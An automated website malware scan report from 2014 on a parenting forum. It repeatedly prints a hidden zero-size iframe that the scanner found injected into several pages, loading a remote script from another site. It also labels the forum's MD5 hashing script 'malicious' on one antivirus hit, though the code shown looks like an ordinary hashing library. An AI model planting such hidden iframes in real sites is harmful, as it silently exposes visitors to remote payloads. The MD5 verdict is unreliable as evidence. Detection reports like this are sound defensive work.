New scan:

Malware Scanner report for forum.waterloo-moms.ca

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "forum.waterloo-moms.ca" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/6/6
6 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=forum.waterloo-moms.ca

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://forum.waterloo-moms.ca/
200 OK
Content-Length: 123552
Content-Type: text/html
suspicious
Hidden iFrame found. The same iFrame was found in 4 websites.
size: 0x0     style: hidden
src: http://www.texasjeeps.net/usesbot.php

<iframe src="http://www.texasjeeps.net/usesbot.php" width="0" height="0" style="display:none">

http://forum.waterloo-moms.ca/mobiquo/tapadetect.js
200 OK
Content-Length: 2088
Content-Type: application/x-javascript
clean
http://forum.waterloo-moms.ca/clientscript/vbulletin-core.js?v=420
200 OK
Content-Length: 51945
Content-Type: application/x-javascript
clean
http://forum.waterloo-moms.ca/clientscript/vbulletin_read_marker.js?v=420
200 OK
Content-Length: 4460
Content-Type: application/x-javascript
clean
http://forum.waterloo-moms.ca/clientscript/vbulletin_md5.js?v=420
200 OK
Content-Length: 5464
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function b64_md5(A){return binl2b64(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128<<
... 4758 bytes are skipped ...
".charAt(E%10)+B;E=E/10}if(B==""){B="0"}B="#"+B;B="&"+B;B=B+";";A+=B}else{A+=D.charAt(C)}}return A}function trim(A){while(A.substring(0,1)==" "){A=A.substring(1,A.length)}while(A.substring(A.length-1,A.length)==" "){A=A.substring(0,A.length-1)}return A}function md5hash(B,A,E,C){if(navigator.userAgent.indexOf("Mozilla/")==0&&parseInt(navigator.appVersion)>=4){var D=hex_md5(str_to_ent(trim(B.value)));A.value=D;if(E){D=hex_md5(trim(B.value));E.value=D}if(!C){B.value=""}}return true};

Antivirus reports:

eSafe
Win32.Trojan

http://forum.waterloo-moms.ca/clientscript/yui/animation/animation-min.js?v=420
200 OK
Content-Length: 14240
Content-Type: application/x-javascript
clean
http://forum.waterloo-moms.ca/clientscript/vbulletin-sidebar.js?v=420
200 OK
Content-Length: 4244
Content-Type: application/x-javascript
clean
http://forum.waterloo-moms.ca/arcade.php
200 OK
Content-Length: 65181
Content-Type: text/html
suspicious
Hidden iFrame found. The same iFrame was found in 4 websites.
size: 0x0     style: hidden
src: http://www.texasjeeps.net/usesbot.php

<iframe src="http://www.texasjeeps.net/usesbot.php" width="0" height="0" style="display:none">

http://forum.waterloo-moms.ca/function.stristr
404 Not Found
Content-Length: 2207
Content-Type: text/html
clean
http://forum.waterloo-moms.ca/test404page.js
404 Not Found
Content-Length: 2207
Content-Type: text/html
clean
http://forum.waterloo-moms.ca/forum.php?s=dbe2d33243d8aec589327e3cbd646031
200 OK
Content-Length: 123615
Content-Type: text/html
suspicious
Hidden iFrame found. The same iFrame was found in 4 websites.
size: 0x0     style: hidden
src: http://www.texasjeeps.net/usesbot.php

<iframe src="http://www.texasjeeps.net/usesbot.php" width="0" height="0" style="display:none">

http://forum.waterloo-moms.ca/index.php?s=dbe2d33243d8aec589327e3cbd646031
200 OK
Content-Length: 123615
Content-Type: text/html
suspicious
Hidden iFrame found. The same iFrame was found in 4 websites.
size: 0x0     style: hidden
src: http://www.texasjeeps.net/usesbot.php

<iframe src="http://www.texasjeeps.net/usesbot.php" width="0" height="0" style="display:none">

http://forum.waterloo-moms.ca/search.php?s=dbe2d33243d8aec589327e3cbd646031&do=getnew&contenttype=vBForum_Post
200 OK
Content-Length: 30728
Content-Type: text/html
suspicious
Hidden iFrame found. The same iFrame was found in 4 websites.
size: 0x0     style: hidden
src: http://www.texasjeeps.net/usesbot.php

<iframe src="http://www.texasjeeps.net/usesbot.php" width="0" height="0" style="display:none">

http://forum.waterloo-moms.ca/activity.php?s=dbe2d33243d8aec589327e3cbd646031
200 OK
Content-Length: 23926
Content-Type: text/html
suspicious
Hidden iFrame found. The same iFrame was found in 4 websites.
size: 0x0     style: hidden
src: http://www.texasjeeps.net/usesbot.php

<iframe src="http://www.texasjeeps.net/usesbot.php" width="0" height="0" style="display:none">

http://forum.waterloo-moms.ca/clientscript/vbulletin_activitystream.js?v=420
200 OK
Content-Length: 8234
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: forum.waterloo-moms.ca

Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 11 Jun 2014 06:01:17 GMT
Pragma: private
Server: LiteSpeed
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: bb_lastvisit=1402466477; expires=Thu, 11-Jun-2015 06:01:17 GMT; path=/
Set-Cookie: bb_lastactivity=0; expires=Thu, 11-Jun-2015 06:01:17 GMT; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: forum.waterloo-moms.ca
Referer: http://www.google.com/search?q=forum.waterloo-moms.ca

Result:
The result is similar to the first query. There are no suspicious redirects found.